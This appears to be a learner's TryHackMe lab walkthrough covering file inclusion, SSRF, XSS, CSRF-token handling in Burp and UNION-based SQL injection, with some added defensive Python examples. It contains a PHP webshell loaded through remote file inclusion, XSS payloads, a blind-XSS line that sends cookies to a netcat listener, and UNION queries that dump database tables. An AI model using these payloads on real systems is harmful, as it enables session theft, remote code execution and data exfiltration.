---
# System prepended metadata

title: web vulnerable
tags: [xss, blind, token bypass, burp suite, meowhecker, web, tryhackme]

---

# web vulnerable

[TOC]

###### tags: `tryhackme` `web`


# File Inclusion




![](https://i.imgur.com/VBoA7yl.png)


Tampering with the cookie -> admin

```
curl 'http://10.10.188.128/challenges/chall2.php?file=/etc/flag2' -H 'Cookie: THM=admins'
```


![](https://i.imgur.com/g4e8Ba9.png)

It specifies the directory; here I try to use path traversal to bypass it.


![](https://i.imgur.com/ZKVwoTD.png)


```
Cookie: THM=../../../../etc/flag2%00
```

![](https://i.imgur.com/0D2Da8w.png)




## Capture Flag3 at /etc/flag3


GET request -> the slash is deleted by the script.

-> use a POST request instead

![](https://i.imgur.com/8WC9Vt9.png)



---

Gain RCE in **Lab #Playground** /playground.php with RFI to execute the hostname command. What is the output?

## Serve the payload with `python3 -m http.server`

```
<?php echo exec('hostname');?>
```

![](https://i.imgur.com/VHWuGEE.png)

![](https://i.imgur.com/QDaGzEC.png)


![](https://i.imgur.com/ktyTjpw.png)

```
<?php print exec($_REQUEST["cmd"]); ?>
```

```
http://10.10.82.106/playground.php?file=http://10.10.23.100:8000/webshell.php&cmd=cat /proc/version
```

# SSRF 

## What is the flag from the /private directory?


## Info

1. **/private**, which gives us an error message explaining that the contents cannot be viewed from our IP address.
2. **/customers/new-account-page** with a new feature allowing customers to choose an avatar for their account.



Step 1: create an account, log in and view [https://10-10-135-212.p.thmlabs.com/customers/new-account-page](https://10-10-135-212.p.thmlabs.com/customers/new-account-page)



Ctrl+Shift+C (inspect element)

![](https://i.imgur.com/TzRDMrr.png)


![](https://i.imgur.com/Q2tzA3z.png)


Choose one of the avatars and then click the **Update Avatar** button


![](https://i.imgur.com/V0ZR5UO.png)



Try to use the SSRF vulnerability to request the /private page

![](https://i.imgur.com/nA2LJBT.png)


Result

![](https://i.imgur.com/lJaiMfF.png)


The application probably has a rule that blocks our forged request.



## Bypass

We use the path traversal trick:

```
value='meowhecker/../private'
```


![](https://i.imgur.com/yNs1yit.png)

[https://www.asciitohex.com/](https://www.asciitohex.com/)

THM{YOU_WORKED_OUT_THE_SSRF}
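Both bypasses above, the `../../../../etc/flag2%00` cookie in the File Inclusion lab and `meowhecker/../private` here, defeat a check that only looks at the start of the supplied path. As an added defender-side example (not code from the labs), here is that naive prefix check beside one that rejects NUL bytes and normalizes the path before testing it; the function names and the allowed prefix `meowhecker` are assumptions.

```python
import posixpath

# Assumed: the directory the avatar feature is meant to serve from.
ALLOWED_PREFIX = "meowhecker"


def naive_allowed(path: str) -> bool:
    """Vulnerable check: tests only the prefix, so 'meowhecker/../private' passes."""
    return path.startswith(ALLOWED_PREFIX + "/")


def normalized_allowed(path: str) -> bool:
    """Hardened check on an already URL-decoded value (the framework decodes %00 once).

    1. Refuse NUL bytes, which truncate the path in C-based file APIs.
    2. Collapse '.' and '..' segments with posixpath.normpath.
    3. Refuse anything absolute or still escaping upwards.
    4. Only then compare against the allowed prefix.
    """
    if "\x00" in path:
        return False
    clean = posixpath.normpath(path)          # 'meowhecker/../private' -> 'private'
    if clean.startswith("/") or clean == ".." or clean.startswith("../"):
        return False
    return clean == ALLOWED_PREFIX or clean.startswith(ALLOWED_PREFIX + "/")


def compare(paths):
    """Return {path: (naive_result, normalized_result)} for a batch of candidate values."""
    return {p: (naive_allowed(p), normalized_allowed(p)) for p in paths}


if __name__ == "__main__":
    # Constructed inputs: the two lab payloads plus a legitimate avatar path.
    for p, verdict in compare(["meowhecker/../private",
                               "../../../../etc/flag2\x00",
                               "meowhecker/avatar1.png"]).items():
        print(repr(p), "naive:", verdict[0], "normalized:", verdict[1])
```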


# XSS payload


## Level 1
```
<script>alert(document.cookie)</script>
```


## Level 2

```
"><svg onload=alert("document.cookie")<!--
```


## Level 3 

```
</textarea><svg onload=alert("document.cookie")>
```


## Level 4 





```
';alert('document.cookie')//
```



![](https://i.imgur.com/XzFGD8t.png)

## Level 5

### Methods 1


```
<svg onload=alert('document.cookie')>
```
![](https://i.imgur.com/2nrrs06.png)


### Methods 2

```
<sscriptcript>alert('document.cookie')</sscriptcript>
```

## Level 6


```
meow" onerror="alert('THM')
```

**THM{XSS_MASTER}**


## Bypass


```
jaVasCript:/*-/*`/*\\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert('THM')//>\\x3e
```

They probably use various tools to generate this code.



`javascript:` is a method for embedding JavaScript code in a web page.

---

# Blind XSS

###### tags: `meowhecker` `xss` `blind` `tryhackme`



Click on the **Customers** tab on the top navigation bar and click the "**Signup here**" link to create an account. Once your account gets set up, click the **Support Tickets** tab, which is the feature we will investigate for weaknesses.


![](https://i.imgur.com/4xMy6ug.png)


```
meow</textarea><svg onload=alert(document.cookie)>
```



Attacker listener

```
nc -nlvp 6699
```


- `-n`: do not resolve DNS names
- `-l`: listen for an incoming connection
- `-v`: verbose output
- `-p`: specify the port





Attack payload 



```
</textarea><svg onload=fetch('http://10.10.164.43:6699?cookie='+btoa(document.cookie))></svg><!--
```
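The Level 3 payload and the blind XSS payload above both start with `</textarea>` because the ticket text is written into the page inside a textarea without encoding, so the first closing tag in the input ends the element and everything after it is parsed as markup. As an added defender-side example (not the lab's code), here is that rendering beside one that HTML-encodes the text, with a checker that counts how many `</textarea>` tags the rendered page ends up with; the function names and the page skeleton are assumptions.

```python
import html
import re

# Constructed ticket text: the break-out payload from the notes above.
TICKET = "meow</textarea><svg onload=alert(document.cookie)>"


def render_vulnerable(text: str) -> str:
    """Inserts the ticket verbatim, so a '</textarea>' in the input closes the element early."""
    return "<form><textarea name=\"ticket\">" + text + "</textarea></form>"


def render_safe(text: str) -> str:
    """HTML-encodes <, >, &, ' and \"; the browser displays the text and never parses it as tags."""
    return "<form><textarea name=\"ticket\">" + html.escape(text, quote=True) + "</textarea></form>"


def textarea_closes(rendered: str) -> int:
    """Number of literal '</textarea>' tags; more than one means user input broke out."""
    return len(re.findall(r"</textarea>", rendered, re.IGNORECASE))


def has_svg_element(rendered: str) -> bool:
    """True if an unencoded '<svg' element survived into the output."""
    return "<svg" in rendered.lower()


if __name__ == "__main__":
    for name, page in (("vulnerable", render_vulnerable(TICKET)),
                       ("safe", render_safe(TICKET))):
        print(name, "closing tags:", textarea_closes(page), "svg present:", has_svg_element(page))
```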
# Burp suite
## CSRF token bypass 

###### tags: `meowhecker` `burp suite` `token bypass`


Needs more practice.

## Target 
http://10.10.56.212/admin/login/

![](https://i.imgur.com/ogmBXiM.png)


### Response 


![](https://i.imgur.com/sFTppbb.png)


![](https://i.imgur.com/sa1hDTz.png)


---

Intruder configuration:

- username -> wordlist
- password -> wordlist
- loginToken -> macro
- session -> macro


## Login token (fetched without an account or password)

![](https://i.imgur.com/L7HjOD2.png)




![](https://i.imgur.com/zkLlaQM.png)


## Build a macro

Macros, in the information security field, are a set of instructions, commonly used in applications or computer systems to automate repetitive tasks or operations. In information security, macros are often used to check whether a system is secure or to automate defence against attacks.


Macros allow us to perform the same set of actions repeatedly. In this case, we simply want to send a GET request to `/admin/login/`.

"Project Options" -> "Sessions" 

![](https://i.imgur.com/x5VupXH.png)

---

![](https://i.imgur.com/6ypWsMb.png)

---

![](https://i.imgur.com/nDf74yB.png)


---

![](https://i.imgur.com/TgId1Ec.png)

---

![](https://i.imgur.com/QXDQAoY.png)


---

![](https://i.imgur.com/9OWJqs2.png)


The macro will now overwrite all of the parameters in our Intruder requests before we send them.

---

![](https://i.imgur.com/cLbPA4x.png)


Now we have a macro defined that will substitute in the CSRF token and session cookie.


![](https://i.imgur.com/vK3ziY3.png)

![](https://i.imgur.com/TXOybQs.png)


# SQLi with Repeater


###### tags: `tryhackme` `web`


## Proof
```
http://10.10.238.248/about/1'
```
![](https://i.imgur.com/deK4Yx1.png)


## Proxy -> Repeater 


- Ctrl+R: send the request to Repeater
- Ctrl+Shift+R: switch to the Repeater tab



```
1 or 1=1
```
![](https://i.imgur.com/tByL2aq.png)




## Build a payload

```
1 union select null,null,null,null,null
```



### Find the column names

```
GET /about/-1 union select "meowhecker",column_name,null,null,null from information_schema.columns where table_name="people"
```

![](https://i.imgur.com/TiPJVz5.png)



---
### Enumerate all columns
```
GET /about/-1 union select "meowhecker",group_concat(column_name),null,null,null from information_schema.columns where table_name="people"
```

![](https://i.imgur.com/ZmlkYqw.png)


Columns:
```
id,firstName,lastName,pfpLink,role,shortRole,bio,notes
```


### Retrieve data

```
GET /about/-1 union select null,null,null,null,concat(id,firstName,lastName,pfpLink,role,shortRole,bio,notes) from people 
```
![](https://i.imgur.com/TRMvqvM.png)
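The `/about/1'` error and the `1 or 1=1` response above show that the id is concatenated straight into the query. As an added example (not the lab's code), here is that vulnerable lookup beside a version that validates the id as an integer and binds it as a parameter, run against an in-memory SQLite table built with the column layout recovered above; the table contents and function names are constructed assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample 'people' table using the columns enumerated on the page."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE people (id INTEGER, firstName TEXT, lastName TEXT, pfpLink TEXT,"
        " role TEXT, shortRole TEXT, bio TEXT, notes TEXT)"
    )
    con.executemany(
        "INSERT INTO people VALUES (?,?,?,?,?,?,?,?)",
        [
            (1, "Ada", "Example", "/img/1.png", "CEO", "ceo", "bio one", "internal note 1"),
            (2, "Bob", "Example", "/img/2.png", "CTO", "cto", "bio two", "internal note 2"),
            (3, "Cy", "Example", "/img/3.png", "Dev", "dev", "bio three", "internal note 3"),
        ],
    )
    return con


def about_vulnerable(con: sqlite3.Connection, user_id: str):
    """Builds the query by string concatenation, so '1 or 1=1' widens the WHERE clause."""
    sql = "SELECT id, firstName, lastName, role, bio FROM people WHERE id = " + user_id
    return con.execute(sql).fetchall()


def about_safe(con: sqlite3.Connection, user_id: str):
    """Rejects non-integer ids (ValueError) and binds the value; input is never parsed as SQL."""
    uid = int(user_id)  # '1 or 1=1' and "1'" both fail here
    return con.execute(
        "SELECT id, firstName, lastName, role, bio FROM people WHERE id = ?", (uid,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1       :", len(about_vulnerable(db, "1")), "row(s)")
    print("vulnerable, id=1 or 1=1:", len(about_vulnerable(db, "1 or 1=1")), "row(s)")
    print("safe, id=1             :", len(about_safe(db, "1")), "row(s)")
```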

